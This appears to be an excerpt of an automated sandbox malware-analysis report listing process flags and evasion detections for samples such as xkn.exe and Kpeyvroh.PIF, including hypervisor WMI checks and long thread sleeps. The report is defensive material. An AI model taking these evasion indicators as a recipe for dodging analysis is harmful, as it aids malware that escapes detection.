                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\alpha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Delayed program exit found
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9FF7A7 Sleep,ExitProcess,28_2_1B9FF7A7
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106F7A7 Sleep,ExitProcess,36_2_2106F7A7
                    Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                    Powershell is started from unusual location (likely to bypass HIPS)
                    Source: c:\users\public\xkn.exeKey value queried: Powershell behaviorJump to behavior
                    Source: C:\Users\Public\xkn.exeMemory allocated: 15A30F30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\Public\xkn.exeMemory allocated: 15A32730000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,28_2_1BA0A748
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,36_2_2107A748
                    Source: C:\Users\Public\xkn.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\Public\xkn.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\Public\xkn.exeWindow / User API: threadDelayed 3177Jump to behavior
                    Source: C:\Users\Public\xkn.exeWindow / User API: threadDelayed 1694Jump to behavior
                    Source: C:\Users\Public\Libraries\sppsvc.pifWindow / User API: threadDelayed 380
                    Source: C:\Users\Public\Libraries\sppsvc.pifWindow / User API: threadDelayed 9329
                    Source: C:\Users\Public\Libraries\sppsvc.pifWindow / User API: foregroundWindowGot 1751
                    Source: C:\Users\Public\alpha.exeEvaded block: after key decisiongraph_4-16877
                    Source: C:\Users\Public\alpha.exeEvaded block: after key decisiongraph_6-16877
                    Source: C:\Users\Public\alpha.exeEvaded block: after key decision
                    Source: C:\Users\Public\alpha.exeAPI coverage: 8.3 %
                    Source: C:\Users\Public\alpha.exeAPI coverage: 8.1 %
                    Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
                    Source: C:\Users\Public\Libraries\sppsvc.pifAPI coverage: 10.0 %
                    Source: C:\Users\Public\alpha.exeAPI coverage: 9.6 %
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFAPI coverage: 6.5 %
                    Source: C:\Users\Public\xkn.exe TID: 5036Thread sleep count: 3177 > 30Jump to behavior
                    Source: C:\Users\Public\xkn.exe TID: 5036Thread sleep count: 1694 > 30Jump to behavior
                    Source: C:\Users\Public\xkn.exe TID: 7960Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Users\Public\xkn.exe TID: 5704Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\sppsvc.pif TID: 8048Thread sleep time: -58500s >= -30000s
                    Source: C:\Users\Public\Libraries\sppsvc.pif TID: 4780Thread sleep time: -1140000s >= -30000s
                    Source: C:\Users\Public\Libraries\sppsvc.pif TID: 4780Thread sleep time: -27987000s >= -30000s
                    Source: C:\Users\Public\alpha.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                    Source: C:\Users\Public\alpha.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF789BD823C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF789BD2978
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF789BC35B8
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF789BC1560
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF789BE7B4C
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF789BD823C
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF789BD2978
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF789BC35B8
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF789BC1560
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF789BE7B4C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,25_2_00007FF67DEB5E58
